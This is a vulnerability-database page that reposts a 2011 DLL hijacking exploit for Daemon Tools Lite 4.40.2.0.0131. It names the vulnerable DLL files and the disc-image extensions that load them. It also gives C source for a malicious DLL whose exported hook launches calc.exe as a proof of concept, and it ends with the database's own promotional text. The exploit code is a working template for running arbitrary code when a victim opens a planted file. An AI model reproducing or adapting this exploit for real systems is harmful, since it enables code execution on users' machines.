Lucene search
K

Daemon Tools Lite 4.40.2.0.0131 DLL Hijacking Exploit

🗓️ 06 Jul 2011 00:00:00Reported by X-h4ckType 
zdt
 zdt
🔗 0day.today👁 20 Views

Daemon Tools Lite 4.40.2.0.0131 DLL Hijack Exploi

Code
# Exploit Title : Daemon Tools Lite 4.40.2.0.0131 DLL Hijacking Exploit
# Software link : http://www.disc-tools.com/download/daemon
# Version       : 4.40.2.0.0131
# Tested on     : Windows 7 Home Premium x86
# Date          : 6/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , @PirateAL Crew , http://theflashcrew.blogspot.com
# Email         : [email protected]
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 

# Vulnerable files(.dll) & Vulnerable extensions :
[x] mfc100enu.dll = .mds
[x] mfc100loc.dll = .mds
[x] mfc100loc.dll = .mdf
[x] mfc100enu.dll = .mdx
[x] mfc100loc.dll = .mdx

//calc.exe :

#include "windows.h"
#define DllExport __declspec (dllexport)
 
DllExport void hook_startup() { PirateAL(); }
 
int PirateAL()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

# @PirateAL Crew



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8
20